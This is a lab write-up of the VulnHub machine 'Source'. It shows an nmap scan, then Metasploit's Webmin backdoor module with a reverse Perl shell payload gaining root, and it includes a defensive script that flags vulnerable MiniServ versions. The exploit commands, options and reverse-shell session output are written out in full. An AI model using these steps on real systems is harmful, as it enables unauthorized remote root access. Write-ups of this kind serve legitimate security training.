[VULNHUB] Source

Today we are going to hack the VulnHub machine called Source. You can download it from the following link: Source


Enumeration


We start with an nmap scan to see which ports are open.

sml@m0nique:~$ nmap -A -p- 192.168.112.143
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-31 13:13 CEST
Nmap scan report for 192.168.112.143
Host is up (0.0013s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b7:4c:d0:bd:e2:7b:1b:15:72:27:64:56:29:15:ea:23 (RSA)
|   256 b7:85:23:11:4f:44:fa:22:00:8e:40:77:5e:cf:28:7c (ECDSA)
|_  256 a9:fe:4b:82:bf:89:34:59:36:5b:ec:da:c2:d3:95:ce (ED25519)
10000/tcp open  http    MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.45 seconds

We can see that it is running MiniServ version 1.890, which contains a backdoor if the build came from SourceForge.
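For the defensive side of this finding, the following added example (not part of the original write-up) parses nmap normal output like the scan above and flags hosts whose banner reports MiniServ 1.890. The function name, the flagged-version set and the second sample host are assumptions made for illustration; the banner version alone does not show whether a build came from SourceForge.

```python
import re

# Only 1.890 comes from the write-up above; extend this set from the vendor
# advisory for your environment (assumption: exact version match only).
FLAGGED_VERSIONS = {"1.890"}

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([^\s()]+)\)?\s*$")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+\S+\s+MiniServ (\d+(?:\.\d+)*) \(Webmin httpd\)")


def find_webmin(nmap_text, flagged=FLAGGED_VERSIONS):
    """Return one dict per open Webmin (MiniServ) port in nmap -sV/-A normal output."""
    findings = []
    host = None
    for line in nmap_text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)  # address of the host the following ports belong to
            continue
        m = PORT_RE.match(line)
        if m and host is not None:
            findings.append({
                "host": host,
                "port": int(m.group(1)),
                "version": m.group(2),
                "flagged": m.group(2) in flagged,
            })
    return findings


# Constructed sample: the first host mirrors the scan above, the second is invented.
SAMPLE = """\
Nmap scan report for 192.168.112.143
Host is up (0.0013s latency).
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
10000/tcp open  http    MiniServ 1.890 (Webmin httpd)
Nmap scan report for intranet.example (192.0.2.10)
Host is up (0.0020s latency).
PORT      STATE SERVICE VERSION
10000/tcp open  http    MiniServ 1.953 (Webmin httpd)
"""

if __name__ == "__main__":
    for hit in find_webmin(SAMPLE):
        status = "REVIEW: verify package origin and upgrade" if hit["flagged"] else "ok"
        print(f'{hit["host"]}:{hit["port"]} MiniServ {hit["version"]} -> {status}')
```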

Exploitation


We start Metasploit.

msfconsole

We will use the module "exploit/linux/http/webmin_backdoor".

msf5 > use exploit/linux/http/webmin_backdoor
msf5 exploit(linux/http/webmin_backdoor) > show options

Module options (exploit/linux/http/webmin_backdoor):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT      10000            yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path to Webmin
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)

We set the values.

msf5 exploit(linux/http/webmin_backdoor) > set lhost 192.168.112.128
msf5 exploit(linux/http/webmin_backdoor) > set rhosts 192.168.112.143
msf5 exploit(linux/http/webmin_backdoor) > set ssl true

And finally, we launch the exploit!

msf5 exploit(linux/http/webmin_backdoor) > exploit

[*] Started reverse TCP handler on 192.168.112.128:4444 
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (192.168.112.128:4444 -> 192.168.112.143:49484) at 2020-07-31 13:38:38 +0200

id
uid=0(root) gid=0(root) groups=0(root)

root.txt



cd /root
ls /root
root.txt
cat /root/root.txt
THM{UPDATE_YOUR_INSTALL}

End


And with that we are root on the machine.